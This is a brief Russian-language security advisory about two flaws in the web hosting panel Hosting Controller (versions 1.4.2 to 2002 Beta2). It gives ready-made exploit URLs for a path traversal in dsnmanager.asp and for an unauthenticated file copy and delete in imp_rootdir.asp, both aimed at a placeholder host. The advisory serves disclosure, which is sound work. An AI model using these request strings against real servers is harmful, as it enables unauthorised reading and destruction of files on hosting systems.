Hosting Controller - приложение, которое централизует все задачи хостинга.
1. Добавляя последовательность символов ‘..\’ к DSNAction в dsnmanager.asp, можно получить доступ к произвольным файлам на диске:
http://www.target.com/admin/dsn/dsnmanager.asp?DSNAction= ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.com\db\..\..\..\..\
2. Любой пользователь может обойти авторизацию и получить полный контроль над любым файлом в системе. Уязвимость находится в файле /import/imp_rootdir.asp, который позволяет любому пользователю копировать, удалять файлы и папки в системе:
http://www.target.com/admin/import/imp_rootdir.asp?result= 1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
Уязвимость обнаружена в в Hosting Controller 1.4.2- v.2002 Beta2.
